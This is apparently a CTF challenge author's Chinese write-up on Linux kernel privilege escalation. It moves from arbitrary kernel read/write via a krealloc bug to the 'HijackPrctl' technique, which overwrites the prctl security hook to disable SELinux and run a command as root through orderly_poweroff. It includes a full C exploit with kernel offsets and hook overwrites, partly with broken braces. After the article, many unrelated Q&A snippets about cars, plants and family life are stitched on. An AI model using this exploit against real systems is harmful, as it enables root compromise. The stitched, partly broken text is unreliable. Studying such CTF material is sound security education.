强网杯出题思路-solid_core-HijackPrctl

2018-03-29 17:58:31 看雪學院

0x00 概述

solid_core出题时候，基本上是以CSAW-2015-CTF的stringipc题目为基础进行内存读写的限制，CSAW-2015-CTF中的题目是一个krealloc的利用。

在krealloc的定义中mm/slab_common.c中

如果size=0,krealloc返回值为0x10

强网杯出题思路-solid_core-HijackPrctl

通过修改size=-1,使得kremalloc的返回值变成0x10,同时size因为是0xFFFFFFFFFFFFFFFF所以可以进行任意地址读写。

强网杯出题思路-solid_core-HijackPrctl

那么传统思路下一步提权的方法有两种，下面进行介绍。

0x01 任意地址读写到权限提升(传统思路)

下面以csaw-2015的stringipc为例子来介绍两种从任意地址读写到权限提升到权限的传统思路

1. 爆破cred结构位置并篡改

做过内核漏洞利用的同学应该都了解task_struct中的cred结构代表了该进程的权限结构。

强网杯出题思路-solid_core-HijackPrctl

如果我们能够修改cred结构的值那么就可以进行提权操作。这是一个很正常的思路，但是我们的cred结构地址在哪里呢？这里CSAW给出的思路是通过prctl设置comm结构为一个Random的字符串是，然后通过爆破这个Random的字符串，每八个字节进行遍历，耗时比较久，但是是可行的。

链接如下 https://github.com/mncoppola/StringIPC/blob/master/solution/solution.c

2. RET2DIR攻击(劫持VDSO)

第二种方法是使用RET2DIR攻击，在这里CSAW-2015-stringipc可以通过攻击VDSO来劫持用户态的代码执行流程。下面我们先来补充一下VDSO的知识：

（1）linux下的VDSO

VDSO(Virtual Dynamically-linked Shared Object)是个很有意思的东西, 它将内核态的调用映射到用户态的地址空间中, 使得调用开销更小, 路径更好.

开销更小比较容易理解, 那么路径更好指的是什么呢? 拿x86下的系统调用举例, 传统的int 0x80有点慢, Intel和AMD分别实现了sysenter, sysexit和syscall, sysret, 即所谓的快速系统调用指令, 使用它们更快, 但是也带来了兼容性的问题.

于是Linux实现了vsyscall, 程序统一调用vsyscall, 具体的选择由内核来决定. 而vsyscall的实现就在VDSO中.

Linux(kernel 2.6 or upper)环境下执行ldd /bin/sh, 会发现有个名字叫linux-vdso.so.1(老点的版本是linux-gate.so.1)的动态文件, 而系统中却找不到它, 它就是VDSO. 例如:

$ ldd /bin/sh

linux-vdso.so.1 => (0x00007fff2f9ff000)

libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f28d5b36000)

/lib64/ld-linux-x86-64.so.2 (0x00007f28d5eca000)

所以，不难理解，VDSO是一段内核空间的代码，用来提供给用户态下更快地调用系统调用。正是因为这个特殊的机制，使得我们可以进行攻击。

在CSAW-CTF-2015的stringipc题目中，内核态下VDSO页的权限是RW，这个代码页会被直接映射到用户态下的进程中，以满足gettime等频繁系统调用的速度。这个代码页映射到用户态的权限属性是RX，就是可以执行。所以，我们可以通过在内核态下通过任意写来修改VDSO的代码，譬如我们修改代码成为prepare_cred+commited_cred等，这样在用户调用VDSO时，就可以劫持控制流了。

具体链接如下: http://itszn.com/blog/?p=21

这里也有一个问题:VDSO位置在哪里呢？这个可以爆破，因为我们有了任意地址读的权限，不过和上面爆破cred结构的技术不一样，我们可以更快的爆破，因为VDSO必定是被安防到一个内存页里面，也就是页对其的，同时它是一个ELF文件，是有ELF Signurte，所以我们可以按照内存页的偏移来进行爆破，这样爆破速度会很快，大概是256倍,而且它的映射位置离内核基址并不是太远，可以很快就出来了。

0x02 题目修改思路

题目为了限制大家不能使用cred覆盖和ret2dir攻击利用方法，我对csaw-ctf-2015进行了修改，限制了内存读写范围。

我进行了限制，限制写入范围必须大于0xffffffff80000000，这个地址在linux内存分布中，是kernel base以上。

附上linux 内核内存分布图

强网杯出题思路-solid_core-HijackPrctl

所以可以限制cred被覆盖，同时编译最新内核以限制VDSO在内核情况下不能被修改。

强网杯出题思路-solid_core-HijackPrctl

可以使得上两种的利用方法失效，以期待有高手能够给出一种另外的利用思路，同时我也给出了一种限制之后可以成功利用思路，也就是HijackPrctl，下面进行详细介绍。

0x03 HijackPrctl- A reliable linux root Techniques

下面介绍从内核地址任意读写(或者可以限制为局部地址读写)到任意代码执行的一种新型的Reliable Linux Root技术，这个思路其实也不算最新的，是来自于INetCop Security 分享的New Reliable Android Kernel Root Exploitation Techniques,这种漏洞利用思路主要是要劫持Prctl函数，最后跳转到call_usermodehelper,我姑且把这种方法称作HijackPrctl。

我们再来确定一下现在能做的事情,我们可以进行局部地址的任意读写，题目限制了读写范围必须大于0xffffffff80000也就是kernel base以上。为了达到代码执行，我们先找一个内核函数看能不能劫持的。

0x01 Prctl(用户和内核沟通的一个绝佳函数)

这里要介绍一下Prctl函数，这个函数可以对进程进行一些设置，通过查看linux内核源码，可以知道这个函数是一个内核漏洞利用中的绝佳函数。

在include/linux/security.h中可以看到cap_task_prctl拥有6个参数。

强网杯出题思路-solid_core-HijackPrctl

同时在kernel/sys.c中，可以看到对于prctl这个系统调用的处理过程中，将参数原封不动的传给了security_task_prctl函数进行处理。

强网杯出题思路-solid_core-HijackPrctl

继续往下跟进，我们发现security_task_prctl这个函数其实最后是定位到了一个虚表里面去，

强网杯出题思路-solid_core-HijackPrctl

在调试时候我们会找到这个hook的位置在哪里，在这里是capability+0x520+0x18这个偏移，这个偏移在IDA中也能分析出来。

强网杯出题思路-solid_core-HijackPrctl

这样的话，我们就找到了一个可以通过用户态传最多6个参数并且到内核态原封不动执行的虚函数。也就是意味我们可以通过修改这个指针，可以任意执行一个函数了。

0x02 32位和64位区别

基于上面的分析我们可以通过用户态传递参数，在内核态下任意执行6个参数以下的函数。再仔细分析一下，对吗？在32位下是可以的，在64位下并不是。我们再看这个函数int security_task_prctl(int option, unsigned long ...)发现第一个参数option是int类型，也就是我们传入的64位会被截断成为32位，这也就导致了64位，第一个参数不能用了。

这个不影响32位下的漏洞利用，我们继续来分析32位如何利用。

其实，这里有很多思路，INetCop Security的Slide里面有，我这里介绍另外一种基于VDSO变形的方法，也是看雪论坛上(https://bbs.pediy.com/thread-220057.htm)，提出的一种方法。

具体思路是:

先通过劫持task_prctl，将其修改成为set_memory_rw

然后传入VDSO的地址，将VDSO修改成为可写的属性，

然后之后的步骤就和劫持VDSO方法是一样的了。

这种方法我进行了验证64位内核上是不可行的，就是因为第一个参数被截断的原因。

0x03 call_usermoderhelper内核线程执行

call_usermoderhelper是内核运行用户程序的一个api,并且该程序有root的权限。如果我们能够控制性的调用它，就能以Root权限执行我们想要执行的程序了。

定义在kernel/umh.c中

强网杯出题思路-solid_core-HijackPrctl

subprocess_info如下

我们要劫持task_prctl到call_usermoderhelper吗，不是的，因为这里的第一个参数也是64位的，也不能直接劫持过来。但是内核中有些代码片段是调用了Call_usermoderhelper的，可以转化为我们所用。

譬如kernel/reboot.c中的orderly_poweroff函数中调用了run_cmd参数是poweroff_cmd,而且poweroff_cmd是一个全局变量，可以修改。

强网杯出题思路-solid_core-HijackPrctl

那么我们就先篡改poweroff_cmd=我们预期执行的命令，然后直接劫持task_prctl到orderly_poweroff函数，这样就任意命令执行了，同时按照INetCop Security给出的思路，需要先关闭selinux。

所以再整理一下整体思路:

利用kremalloc的问题，达到任意地址读写的能力

通过快速爆破，泄露出VDSO地址。

利用VDSO和kernel_base相差不远的特性，泄露出内核基址

篡改prctl的hook为selinux_disable函数的地址

调用prctl使得selinux失效

篡改poweroff_cmd使其等于我们预期执行的命令。

篡改prctl的hook为orderly_poweroff

调用prctl执行我们预期的命令，达到内核提权的效果。

最后给出利用程序如下

#include

#define CSAW_IOCTL_BASE 0x77617363

#define CSAW_ALLOC_CHANNEL CSAW_IOCTL_BASE+1

#define CSAW_OPEN_CHANNEL CSAW_IOCTL_BASE+2

#define CSAW_GROW_CHANNEL CSAW_IOCTL_BASE+3

#define CSAW_SHRINK_CHANNEL CSAW_IOCTL_BASE+4

#define CSAW_READ_CHANNEL CSAW_IOCTL_BASE+5

#define CSAW_WRITE_CHANNEL CSAW_IOCTL_BASE+6

#define CSAW_SEEK_CHANNEL CSAW_IOCTL_BASE+7

#define CSAW_CLOSE_CHANNEL CSAW_IOCTL_BASE+8

struct alloc_channel_args {

size_t buf_size;

int id;

};

struct open_channel_args {

int id;

};

struct read_channel_args {

int id;

char *buf;

size_t count;

};

struct write_channel_args {

int id;

char *buf;

size_t count;

};

struct close_channel_args {

int id;

};

struct shrink_channel_args {

int id;

size_t size;

};

struct seek_channel_args {

int id;

loff_t index;

int whence;

};

int ID = 0;

int FD = 0;

void readMem(void* ptr, void* addr, size_t count) {

struct seek_channel_args seekArgs;

seekArgs.id = ID;

seekArgs.index = addr-0x10;

seekArgs.whence = SEEK_SET;

int ret = ioctl(FD, CSAW_SEEK_CHANNEL, &seekArgs);

int err = errno;

//fprintf(stderr,"Seek: %x err:%u\n",ret,err);

struct read_channel_args readArgs;

readArgs.id = ID;

readArgs.buf = ptr;

readArgs.count = count;

ret = ioctl(FD, CSAW_READ_CHANNEL, &readArgs);

err = errno;

//fprintf(stderr,"read: %x err:%u\n",ret,err);

}

void writeMem(void* ptr, void* addr, size_t count) {

struct seek_channel_args seekArgs;

seekArgs.id = ID;

seekArgs.index = addr-0x10;

seekArgs.whence = SEEK_SET;

int ret = ioctl(FD, CSAW_SEEK_CHANNEL, &seekArgs);

int err = errno;

//fprintf(stderr,"Seek: %x err:%u\n",ret,err);

struct write_channel_args writeArgs;

writeArgs.id = ID;

writeArgs.buf = ptr;

writeArgs.count = count;

ret = ioctl(FD, CSAW_WRITE_CHANNEL, &writeArgs);

err = errno;

//fprintf(stderr,"write: %x err:%u\n",ret,err);

}

int main(int argc,char* argv[]) {

//offset_set_memory_rw 0x079340 sbin_poweroff 0x123D1E0 call_poweroff 0x09C4C0

//offset_prctl_hook 0x124FD00 selinux_disable 0x2C7BA0

//./exp 0x124FCC0 0x123D2E0 0x09D510 0x2C2E10

//capability+0x520

long unsigned int offset_set_memory_rw=0x06da70;

long unsigned int offset_prctl_hook=0x1140ae0;

long unsigned int offset_task_prctl=0x2f7e69;

long unsigned int offset_call_modprobe=0x0ae3b2;

//long unsigned int offset_call_poweroff=0x0a0880;//call_usermod

long unsigned int offset_call_poweroff=0x0acb00;

long unsigned int offset_selinux_disable=0x303b10;

long unsigned int offset_sbin_poweroff=0x105a4e0;

long unsigned int offset_modprobe_path=0x105ac80;

if (argc!=5)

{

fprintf(stderr,"Usage: %s offset_prctl_hook offset_sbin_poweroff offset_call_poweroff offset_selinux_disable\n",argv[0]);

exit(-1);

}

//offset_set_memory_rw=strtoul(argv[1],NULL,16);

offset_prctl_hook=strtoul(argv[1],NULL,16);

offset_sbin_poweroff=strtoul(argv[2],NULL,16);

offset_call_poweroff=strtoul(argv[3],NULL,16);

offset_selinux_disable=strtoul(argv[4],NULL,16);

int fd = open("/proc/simp1e",O_NONBLOCK);

char cmd[256];

memset(cmd,0,sizeof(cmd));

fprintf(stderr,"Input Your Cmd $:");

read(0,&cmd,256);

FD = fd;

struct alloc_channel_args arg1;

arg1.buf_size=100;

int ret = ioctl(fd,CSAW_ALLOC_CHANNEL,&arg1);

fprintf(stderr,"allocate fd: %d ret: %d id:%u\n",fd,ret,arg1.id);

ID = arg1.id;

struct shrink_channel_args shrinkArgs;

shrinkArgs.id = arg1.id;

shrinkArgs.size=101;

ret = ioctl(fd, CSAW_SHRINK_CHANNEL, &shrinkArgs);

int err = errno;

fprintf(stderr,"Shrink: %d err:%u\n",ret,err);

fprintf(stderr,"ZERO_SIZED_POINTER = %p\n",((void*)16));

//Random buffer to throw things into

//char* what = malloc(0x1000*0x1000);

//Scanning for elf headers to find VDSO

void* header = 0;

void* loc = 0xffffffff80000000;

size_t i = 0;

for (; loc<0xffffffffffffafff; loc+=0x1000) {

readMem(&header,loc,8);

if (header==0x010102464c457f) {

fprintf(stderr,"%p elf\n",loc);

readMem(&header,loc+0x2B8,8);

//Look for 'clock_ge' signature (may not be at this offset, but happened to be)

if (header==0x65675f6b636f6c63) {

fprintf(stderr,"%p found it?\n",loc);

break;

}

long unsigned int kernel_base=(long unsigned int)loc&0xffffffffff000000;

long unsigned int real_set_memory_rw=kernel_base+offset_set_memory_rw;

long unsigned int real_prctl_hook=kernel_base+offset_prctl_hook;

long unsigned int real_task_prctl=0;

long unsigned int real_call_modprobe=0;

long unsigned int real_modprobe_path=0;

long unsigned int real_selinux_disable=0;

long unsigned int real_sbin_poweroff=kernel_base+offset_sbin_poweroff;

long unsigned int real_call_poweroff=0;

long unsigned int try_offset=0;

//cur_offset= (real_set_memory_rw >>20 ) &0xff

printf("real_sbin_poweroff:%p real_prctl_hook:%p\n",real_sbin_poweroff,real_prctl_hook);

for( i=0; i<0x20;i+=1)

{

try_offset = real_sbin_poweroff- 0x100000*i ;

printf("%p is trying!\n",try_offset);

readMem(&header, (void*)try_offset,8);

printf("%p is read!\n",header);

//if (header==0xec834800f28db6e8){

if (header==0x6f702f6e6962732f){

fprintf(stderr,"%p is real_sbin_poweroff\n",try_offset);

real_sbin_poweroff=try_offset;

real_prctl_hook-=(0x100000*i);

break;

}

if (i==0x20)

{

fprintf(stderr,"Not found!\n");

exit(-1);

}

real_task_prctl = real_sbin_poweroff -offset_sbin_poweroff + offset_task_prctl;

//real_call_modprobe = real_sbin_poweroff -offset_sbin_poweroff + offset_call_modprobe;

printf("set_memory_rw:%p real_prctl_hook:%p \n real_task_prctl:%p\n real_call_modprobe:%p \n",real_set_memory_rw,real_prctl_hook,real_task_prctl,real_call_modprobe);

//real_modprobe_path = real_sbin_poweroff -offset_sbin_poweroff + offset_modprobe_path;

real_selinux_disable = real_sbin_poweroff -offset_sbin_poweroff + offset_selinux_disable;

real_sbin_poweroff = real_sbin_poweroff -offset_sbin_poweroff + offset_sbin_poweroff;

real_call_poweroff = real_sbin_poweroff -offset_sbin_poweroff + offset_call_poweroff;

printf("path %p selinux_disable: %p\n",real_modprobe_path,real_selinux_disable);

printf("Hijiack Prctl!\n");

getchar();

writeMem(&real_selinux_disable,real_prctl_hook,sizeof(real_set_memory_rw));

ret = prctl(loc,2, loc,loc,2);

//char * hijack_path= "/bin/ls\\x00";

//char * hijack_path= "/bin/cat /flag > /tmp/flag\\x00\\x00\\x00";

char * hijack_path= "/bin/mkdir -p /tmp/x0x\\x00\\x00\\x00";

//writeMem(hijack_path,real_modprobe_path,128);

//writeMem(hijack_path,real_sbin_poweroff,128);

writeMem(&cmd,real_sbin_poweroff,228);

//exit(-1);

//Write our shellcode over the gettimeofday function at offset 0xca0

//writeMem(&real_set_memory_rw,real_prctl_hook,sizeof(real_set_memory_rw));

writeMem(&real_call_poweroff,real_prctl_hook,sizeof(real_set_memory_rw));

printf("Start Prctl!\n");

getchar();

ret = prctl(loc,2, loc,loc,2);

printf("end Prctl!\n");

for(i=0;i<0x0;i+=1)

{

writeMem(&real_call_poweroff,real_prctl_hook+8*i,sizeof(real_set_memory_rw));

}

//Write our shellcode over the gettimeofday function at offset 0xca0

// writeMem(sc,loc+0xd30,strlen(sc));

//Wait a bit for a daemon or logger to call gettimeofday()

// system("nc -l -p 3333 -v");

// exit(1);

}

0x04 写在后面

很惨，出题时候由于一些设置问题，产生了一些的非预期解(一共有5只队伍解出题目，三只使用非预期解，两只使用正解)，不过这些非预期解也让我学习到了很多知识(姿势)。

同时在题目部署中也出现了一些问题，但是因为已经出现了非预期解，保持题目公平性，所以也就没有进行继续修改了。

同时在出这道题目的过程中，多次对内核进行编译，对于很多以前不知道的内核知识进行补充，踩了很多坑，也学了很多。

最后祝贺做出此题的战队以及参与强网杯比赛的各位战队，希望能够和各位大神继续交流内核漏洞相关的知识。

同时最近出现的ubuntu16.04提权漏洞也是一个任意内存读写漏洞，理论上也能够使用该种方法进行提权，下面我会抽时间进行调试并分析。

如果大家还想继续做这道题目的话，题目继续在10.9.173.101 9999开放。

同时本文也在本人博客上面进行发表。http://leanote.com/blog/post/5ab78270ab64413755000dcf

vdso http://adam8157.info/blog/2011/10/linux-vdso/

ret2dir http://www.cnblogs.com/0xJDchen/p/6143102.html

usermode-helper https://www.ibm.com/developerworks/cn/linux/l-user-space-apps/index.html

attack_vdso https://hardenedlinux.github.io/translation/2015/11/25/Translation-Bypassing-SMEP-Using-vDSO-Overwrites.html

ret2dir-balckhat https://www.blackhat.com/docs/eu-14/materials/eu-14-Kemerlis-Ret2dir-Deconstructing-Kernel-Isolation.pdf

reliable linux root http://powerofcommunity.net/poc2016/x82.pdf

利用分页机制进行攻击

https://github.com/n3k/CansecWest2016_Getting_Physical_Extreme_Abuse_of_Intel_Based_Paging_Systems/blob/master/Demos/Linux/driver/kernetix.c

New Reliable Android Kernel Root Exploitation Techniques http://powerofcommunity.net/poc2016/x82.pdf

分享到:

閱讀更多 看雪學院 的文章

關鍵字: FLAG Linux 思路

刚刚工作的毕业生，一个月只有2000多，是不是太少了？

刚刚:刚刚工作的毕业生，一个月只有2000多，是不是太少了？根据你城市消费水平来看啊，还有你从事的工作，假如你在二三线城市做一份事业单位或者是编制类的工作，薪资水平是随着你工作年限逐年增长的，而且在年终也有很多福利补贴待遇等等，算下来收入也是可观的，再举一个例:-毕业生 2000

为什么只有edg赚钱？

电竞行业作为一个新兴产业，这几年发展势头越来越好，IG战队，FPX战队先后夺得了s8-s9世界赛的冠军，据俱乐部知情人士透露，除了国内的几家豪门俱乐部之外，其他俱乐部基本都是亏钱在做的，当然EDG也是:-edg 赚钱:为什么只有edg赚钱？

网上罗马仕充电宝20000毫安的，参数怎么很多样？哪个是真的？

20000:网上罗马仕充电宝20000毫安的，参数怎么很多样？哪个是真的？天猫旗舰店，或者淘宝旗舰店，或者京东旗舰店肯定包真，质量好，再说可以官方验证啊，不能图那十块五块的便宜，毕竟一个充电宝要用好久呢，一两年没问题的。:-罗马仕马仕毫安

我们买的新商品房还没有拿到房产证，怎么转卖最好？

没有取得房抄产证的房子可以转让。但如果确定无法取得房产证的，房产转让不受法律保袭护。一般情况下，只有取得房产证的房屋才能确定房屋产权人，才具有转让的条件。但如果房屋是合法取得的，以百后可以依法办理度房:-转卖房产证商品房拿到:我们买的新商品房还没有拿到房产证，怎么转卖最好？

为什么突厥人可以成功复国？是大唐的刀不锋利了么？

锋利突厥人你这样说只能说明你对历史非常不了解，我先用一句话概括突厥被大唐雄兵打的有多惨：三次灭国，背井离乡，远赴西亚，打不过，俺躲着你还不行吗？突厥的意思是中间怂起的头盔。其来历已经不可靠，可能有着匈奴、鲜卑或:-复国大唐:为什么突厥人可以成功复国？是大唐的刀不锋利了么？

小高层16层高楼间距60米哪一层比较好？

小高层 60:小高层16层高楼间距60米哪一层比较好？首先需要明白，选择层数居住与楼间距毫无关系，住在哪一层，肉眼看对面楼的距离，是相差不大的。设定楼间距60米，纯粹是混淆视听。其实，一幢楼的楼层总数确定的情况下，到底哪一层最佳？很简单，取总层数乘以黄金:-楼间距层高

金银花盆栽好养吗？怎么养？

金银花可以盆栽，很好养的！金银花，是忍冬科的常绿缠绕灌木，枝条柔韧修长，多攀爬或匍匐生长。金银花生性强健，在我国的很多南方省份野外很多地区都能看到它的身影，叶子常年翠绿，到夏季开花，飘香四溢。所以，有:-金银花盆栽:金银花盆栽好养吗？怎么养？

长城对于抵御古代匈奴和蒙古人起到了多大作用？

长城真的无用吗？在今天许多人认为长城无用，古代国家举国之力建造的长城不过只是文物，就连康熙都曾作诗讽刺，原文如下：万里经营到海涯，纷纷调发逐浮夸。当时用尽生民力，天下何曾属尔家。-康熙但真的如此吗？小:-匈奴抵御长城:长城对于抵御古代匈奴和蒙古人起到了多大作用？蒙古人

什么树可以嫁接腊梅？

腊梅只能嫁接在不同品种的腊梅上，其他的树种不行！腊梅的繁殖可以用播种，压条，嫁接，分株等繁殖方法。播种法因不易保持花卉的原有优良特性，且播种的优点是在于大量繁殖，而腊梅大都只需培植少量几株，故一般都不:-腊梅嫁接:什么树可以嫁接腊梅？

行情堪忧，还有多少教育机构的老师们五一假期有课上的？课时量多不多？

堪忧五一假期:行情堪忧，还有多少教育机构的老师们五一假期有课上的？课时量多不多？事实上，因为教育培训都是预收费用的模式。但凡有一点点规模的培训机构老师。在上半年，带课量是可以得到保证。:-课时量

在农村“立夏节”都有哪些民间习俗？

民间习俗农村:在农村“立夏节”都有哪些民间习俗？在农村“立夏节”都有哪些民间习俗一、农村立夏常见的习俗风俗活动：1、吃鸡蛋“立夏吃蛋”习俗由来已久，俗话说“立夏吃了蛋，夏天不疰夏”。据说立夏开始天气越来越热，村里小孩儿会有身体疲劳四肢无力的感觉，吃:-立夏节

男朋友失望分手，但对我还有感觉，答应我两个月之后可以在一起，我应该怎么做，才能改变之前他对我的看法？

失望分手看法:男朋友失望分手，但对我还有感觉，答应我两个月之后可以在一起，我应该怎么做，才能改变之前他对我的看法？你的这个问题特别的有趣，我觉得你先不要看你要怎么做才让他才能让他对你的印象有所改变，你要去看为什么是两个月之后可以在一起，这两个月他会用来做什么，为什么会有这两个月？例如他的身体碰到了什么样的问题吗？:-答应我

工程分包乙方人员伤残谁承担？

承担:工程分包乙方人员伤残谁承担？分包乙方分包致人伤残责任谁承担？严格来说，需要了解更多伤残原因才能区分的，作为非专业人士，自己发表一点浅见供题主参考：1、如果甲方是央企的话，他们合同中的责任、义务等条款内已经将自己的责任全部撇开了，更会:-乙方伤残

有哪些看起来毫不相关的两个历史人物实际上有过联系？

实际上:有哪些看起来毫不相关的两个历史人物实际上有过联系？历史人物联系这个词貌似太宽泛了，就好像有一个调皮的答案说的，胡亥和溥仪相隔2000多年，牵强的找，也有联系：都是亡国之君不是。我想题主的意思是两个看起来应该风马牛不相及的人物，在历史上居然是熟悉或是一个时代的:-毫不相关

13年雪铁龙世嘉自动挡7万多公里，没有水泡事故，多少钱能买？

法系车不保值，如果准备常开可以入手，性价比高，价格应该在二至三万之间，二手车一车一况，一况一价，居体价格看车况。:-钱能水泡:13年雪铁龙世嘉自动挡7万多公里，没有水泡事故，多少钱能买？世嘉自动挡

22+吃土少女17年就有驾驶证了，今年才开始开车，想买个二手昂克赛拉，或者有什么好建议吗？

17年驾驶证二手:22+吃土少女17年就有驾驶证了，今年才开始开车，想买个二手昂克赛拉，或者有什么好建议吗？建议买日系二手车，开顺了卖了，买新车，昂克赛拉无法再次出手时获得好价格，而且也不省油，开完日系车直接换德系:-昂克赛拉

如何骑车去台湾骑行？

骑车在台湾没有回归内地前，最好不要去台湾，一是国内政策不允许你去台湾，因为已停止了台湾个人游。二是你偷着去台湾旅游，安全没有保障，偷渡客在哪里也没有安全保障的。以后内地政策允许个人去台湾旅游了，建议那时再:-骑行台湾:如何骑车去台湾骑行？

本人预算5万左右，想买一辆二手法系车！求推荐？

预算:本人预算5万左右，想买一辆二手法系车！求推荐？ 5万预算5万元左右，想买一辆二手法系车？推荐东风标致老款308车型。1 5万元可以买标致308车况好的，没大事故呢，年限15年左右，公里数3万左右，手动档车型。2 标致308车型，底盘调教扎实，跑高速稳定:-法系二手

14年进口马自达5PK进口10年道奇酷威买哪个划算？

道奇你好，好高兴回答你的问题！14年进口马自达5和10年月道奇酷威个人感觉马自达5比较划算。新车价马5报价29.99万，酷威19.38万两款车都是原装进口，马5属于日系，酷威属于美系。两款车不属于同类车型:-酷威马自达 14年:14年进口马自达5PK进口10年道奇酷威买哪个划算？

2020年，河南教育行业国务院特殊津贴推荐，河南大学并列第三，大家怎么看？

特殊津贴高校人才就要重视，河南省高校人才更要重视，这个人才不是评出了的，而是推荐出来的，没有推荐，连参评的资格都没有。国务院特殊津贴人员推荐，不推荐是百分百没希望，推荐了希望就非常，那么是什么是国务院特殊津贴:-河南大学并列 2020年:2020年，河南教育行业国务院特殊津贴推荐，河南大学并列第三，大家怎么看？

本田CRV2019款1.5T舒适版油耗高吗？

李老猫说车为你非专业解答各种选车用车问题本田crv定位于一款紧凑级suv产品，主要对飚丰田荣放，日产奇骏，这款车整体市场表现非常突出，2019年全年累计销量为18.44万台，平均月销1.5万以上，其深:-舒适版本田油耗:本田CRV2019款1.5T舒适版油耗高吗？

国外疫情如果没有得到有效控制，世界会发生什么事情？头脑风暴？

1.世界经济遭到重创疫情影响之下，各行各业基本属于停工停产的状态，在世界经济趋于一体化的今天，停工停产势必会造成一系列的连锁反应，最后导致的结果可能会引发金融危机。2.世界格局可能发生改变美国仍是世界:-头脑风暴控制:国外疫情如果没有得到有效控制，世界会发生什么事情？头脑风暴？疫情国外

本田XRV这款车的整体表现怎么样？我想买1.5T自动豪华版，全款多少钱？

如果有15万元的预算，让你选择一台空间和动力都很不错的小型SUV，我觉得很多的读者都会想到本田XRV这款车型。因为本田XRV确实太出色了，和同级别的其他盒子SUV车型相比，这款车在空间和动力上都有优势:-xrv 自动:本田XRV这款车的整体表现怎么样？我想买1.5T自动豪华版，全款多少钱？本田豪华版

现在存款有14万，借了5万还没收回来，该做什么好？

何去何从:现在存款有14万，借了5万还没收回来，该做什么好？续租存款利息率较低，可以投资较高收益的项目，比如投资基金，一般情况下可获得6%一10%的回报。如果行情好可达到50%以上收益，去年不少基金超过这目标。目前受疫情影响，股市在低位震荡，也是基金投资的机会。一:-存款 2300

2070super和5700xt买哪个比较好？

如果是玩游戏毫无疑问选择n卡，也就是2070 suep。如果追求性价比可以选择a卡，也就是5700xt. 为什么游戏选n卡呢？首先游戏厂商针对n卡优化比较多，然后就是功耗小，然后N卡架构执行效率极高，:-:2070super和5700xt买哪个比较好？

生完二胎后，感觉自己有点抑郁，总是想发火，特别烦躁，怎么办？

二胎我是两个孩子的妈妈，曾经的我和你一样，生完宝宝我也抑郁了，我知道抑郁症真的很痛苦，产后的那段日子我整天都不开心，做什么事也没积极性，谁也不想搭理，别人给我说话我就觉得很烦。忍不住冲家人发脾气。每当一个:-生完抑郁:生完二胎后，感觉自己有点抑郁，总是想发火，特别烦躁，怎么办？发火

人这一生遇到的人和事为什么感觉都像是必然的经历？

感觉:人这一生遇到的人和事为什么感觉都像是必然的经历？正所谓有因必有果，所以你今天的因，就会产生明天的果。所以这一切你就会觉得是必然的。生活中大部分是普通人大家的生活规律，生活方式，大致相同。当你看到别人家庭的果，自己家也产生同样的果，你就会觉得这一切是:-人和经历

现在校内校外到底教的是美式英语还是英式英语还是混搭英语？

校内:现在校内校外到底教的是美式英语还是英式英语还是混搭英语？校外英式答案肯定是不唯一的！美式英语现在是主流，少量英式发音也个别存在！但对于孩子来说，肯定是混搭英语，因为孩子肯定不是一直一位老师教下去，肯定会换老师！而老师的发音肯定是既有英式的，也有美式的！就连一些英语:-美式英语

上有老下有小，我们真的跳不出这个人生循环了吗？

上有老魔咒:上有老下有小，我们真的跳不出这个人生循环了吗？的确如此，尽管现在不结婚，晚婚的人很多，但是从人类繁洐生息的历史和大多数人来看，成家立业，生儿育女，家庭仍是主流，一个人的生理，心理和生存需求決定了生存状态，生儿育女，瞻养父母即是义务责任，也是生活动:-下有小

如果外面正在下小雨，你会突然想起了谁？

想起:如果外面正在下小雨，你会突然想起了谁？我最不忘，还是秋日的雨夜，天又凉了几分，已经需要披上一件薄薄的外套了。临窗而望，眼见窗台上的几株小植物，叶片上沾了几滴小雨珠，我总喜欢，用小手电去照它们，这样的小水滴看起来晶莹晶莹的，有一种清清凉凉的:-小雨

初中同学许久未见大学期间突然联系请吃饭，态度还良好，我给推了，会不会让人很烦？

初中同学:初中同学许久未见大学期间突然联系请吃饭，态度还良好，我给推了，会不会让人很烦？吃饭许久未见，意思就是交情不怎么样，无功不受禄，人家凭什么那么热情，难道真的是多年一来忘不了咱们之间的同学情谊，倍感想念了吗，不是请帮忙、做业务、就是借钱，十有八九十借钱。我建议还是不要去的好，大家都很忙:-许久未见

现在我觉得认真对某个人说我喜欢你什么的这种话好恶心，我爱你更说不出口，好恶心，是什么心理？

出口心理:现在我觉得认真对某个人说我喜欢你什么的这种话好恶心，我爱你更说不出口，好恶心，是什么心理？爱你更多的是心里问题，可能对方还没有优秀到你满意的程度，更没有到那种离不开的地步！爱情最终还是要回归生活，而生活离不开两个人的相处，父母终究会老，孩子终究会飞，所以选择自己的伴侣尤为重要，你现在觉得恶心更:-喜欢你

剧版的《何以笙箫默》和《再见王沥川》哪一个更好看呢？

再见王沥川好看:剧版的《何以笙箫默》和《再见王沥川》哪一个更好看呢？《遇见王沥川》吧，高以翔的王沥川太招人稀罕了。长相，身材，家世，人品，才能样样好，简直完美，挑不出任何毛病，实在要说一个缺点的话，那就是太tm完美，天妒英才、才让他饱受病魔折磨。偶像剧、深情帅气的男主:-何以笙箫默

计算机专业本科能够进入字节跳动、华为这些公司做开发吗？是否还需要继续读研？

学历是求职必备条件。有了工作不能停止对知识的探索。更高的学历，可以让你有更专业的技术能力和学习能力，可以让你拓展自己的交际圈，可以让你更知名。总之，活到老，学到老，学习对人总是有好处的，技多不压身嘛！:-字节跳动:计算机专业本科能够进入字节跳动、华为这些公司做开发吗？是否还需要继续读研？读研计算机专业

生完二胎的你们，现在有什么感想？

二胎家庭日常是什么样的？是不是觉得家里多了一个小人儿，温馨多了？不存在的！生二胎根本是妈妈们的渡劫磨砺！以前周末睡到自然醒，现在全年无休，时刻警醒着，能睡一次懒觉跟过年似的，黑眼圈不说，头发呼啦啦地掉:-生完二胎感想:生完二胎的你们，现在有什么感想？

华北适合种植蚕豆吗？

华北适合种植蚕豆，种蚕豆的面积大，在西北，华北，都在种植蚕豆，蚕豆茎秆根部有根瘤菌是种植其它农作物的好茬地，特别是土壤培养和防病虫害起到作用。:-蚕豆种植适合:华北适合种植蚕豆吗？华北

华为手机更新EMUI10.1系统后效果咋样？

大家知道现在智能手机的性能不仅仅跟智能手机的硬件有关，还跟智能手机的系统软件息息相关，在国产智能手机操作系统里，小米的MIUI系统跟华为的EMUI系统都是比较优秀的操作系统。最近小米推出了小米MIUI:-咋样华为华为手机更新:华为手机更新EMUI10.1系统后效果咋样？

大热天蜜蜂老是爬到箱外结群正常吗？

